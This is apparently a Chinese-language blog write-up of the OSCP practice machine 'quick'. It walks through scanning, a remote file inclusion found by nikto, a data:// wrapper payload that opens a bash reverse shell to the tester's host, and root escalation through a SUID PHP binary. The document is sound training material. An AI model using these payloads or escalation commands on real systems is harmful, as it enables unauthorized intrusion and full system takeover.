【OSCP】quick

admin

102523
文章

87
评论

2024年3月24日04:20:14评论3 views字数 2749阅读9分9秒阅读模式

OSCP 靶场

靶场介绍

quick

easy

漏洞挖掘、rfi 远程文件包含利用、伪协议利用、suid-php提权

信息收集

主机发现

nmap -sn 192.168.31.0/24

【OSCP】quick

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.97 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 11:44 EST
Nmap scan report for 192.168.31.97
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

目录扫描

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -u http://192.168.31.97 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/images               (Status: 301) [Size: 315] [--> http://192.168.31.97/images/]
http://192.168.31.97/home.php             (Status: 200) [Size: 2534]
http://192.168.31.97/contact.php          (Status: 200) [Size: 1395]
http://192.168.31.97/about.php            (Status: 200) [Size: 1446]
http://192.168.31.97/index.php            (Status: 200) [Size: 3735]
http://192.168.31.97/cars.php             (Status: 200) [Size: 1502]
http://192.168.31.97/connect.php          (Status: 500) [Size: 0]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/send_email.php       (Status: 302) [Size: 0] [--> contact.php]
http://192.168.31.97/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

权限获取

这里通常存在文件包含或者命令执行，但是爆破了都没发现响应。利用nikto 扫描发现存在rfi

http://192.168.31.97/index.php?page=cars

nikto --url http://192.168.31.97

【OSCP】quick

我们将phpinfo写入kali,然后开启web 服务，利用远程文件包含成功执行phpinfo。这里需要注意的是后面会自动拼接.php 后缀。

【OSCP】quick

这里直接利用伪协议反弹shell

【OSCP】quick

http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E
http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.31.181/4444+0%3E%261%27%22);?%3E

【OSCP】quick

权限提升

【OSCP】quick

find / -type f -perm -u=s 2>/dev/null

【OSCP】quick

https://gtfobins.github.io/gtfobins/php/#sudo

【OSCP】quick

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh',['-p']);"

【OSCP】quick

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】quick

左青龙
微信扫一扫

右白虎
微信扫一扫

【OSCP】quick

靶场介绍

信息收集

主机发现

端口扫描

目录扫描

权限获取

权限提升

记一次有源码的渗透测试

经典：“红日三”服务器群靶机

Google如何利用生成式AI加速事件响应流程

Hack The Box-start point-Archetype笔记

使用 Burp 枚举 REST API

fastjson-BCEL不出网打法原理分析

改变content-type类型所触发的csrf

【OSCP】vivifytech

从零开始的Kubernetes攻防

一次js混淆测试记录

发表评论

在线咨询

微信